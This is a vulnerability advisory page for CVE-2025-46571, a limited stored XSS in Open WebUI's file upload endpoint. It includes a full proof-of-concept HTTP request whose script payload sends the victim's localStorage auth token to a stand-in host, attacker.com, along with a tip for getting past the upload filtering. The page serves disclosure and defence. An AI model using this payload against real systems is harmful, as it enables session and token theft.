CVE-2025-46571
Summary
Low privileged users can upload HTML files which contain JavaScript code via the /api/v1/files/ backend endpoint. This endpoint returns a file id, which can be used to open the file in the browser and trigger the JavaScript code in the user's browser. Under the default settings, files uploaded by low-privileged users can only be viewed by admins or themselves, limiting the impact of this vulnerability.
Details
The following HTTP request can be sent to the backend server to upload a file with the contents:
<script>fetch("https://attacker.com/?token=" + localStorage.getItem("token"))</script>
POST /api/v1/files/ HTTP/1.1
Host: localhost:8080
Content-Length: 286
authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Ijg2NjA1NTZhLTc0OWQtNDdmNS1iMjgwLWRiYzkyYzc2ZjM1NiJ9.4cImklYQUVi3dlXmRtQwdZKEleu0cq4tXompMod8X2U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryr0PnRBBHKXD9UEdm
------WebKitFormBoundaryr0PnRBBHKXD9UEdm
Content-Disposition: form-data; name="file"; filename="test.html"
Content-Type: text/html
<h1>padding</h1>
<script>fetch("https://attacker.com/?token=" + localStorage.getItem("token"))</script>
------WebKitFormBoundaryr0PnRBBHKXD9UEdm--
Note the filename="test.html" , Content-Type: text/html, and <h1>padding</h> in the request's body. These are important because some form of sanitization or filtering was observed which caused errors when uploading an html file that only conained a <script> tag.
The backend server responds to the above request with JSON data that contains an id parameter.
image
This ID can be used to view the uploaded file in the browser at <Backend_URL>/api/v1/files/<file_id>/content/html
Because of the authorization checks done on lines https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/files.py#L434-L438, this file can only be viewed by admins
⚡ Watch CVE-2025-46571
Get an email if CVE-2025-46571 is added to CISA KEV, gains public exploit code, or a new advisory cites it — max one per day, one-click unsubscribe.
Exploitation outlook
- Low exploitation risk0.30% 30-day exploitation probability — currently an unlikely target, but scores change as exploit code circulates. Riskier than 22% of all EPSS-scored CVEs.
Advisory coverage (1)
- mediumGHSA-8gh5-qqh8-hq3x: Open WebUI allows limited stored XSS vila uploaded html fileghsa · 2026-07-07
External references
Embed the live status
— this badge updates automatically when the KEV or exploit status changes. How to embed it →
[](https://www.csirts.com/cve/CVE-2025-46571)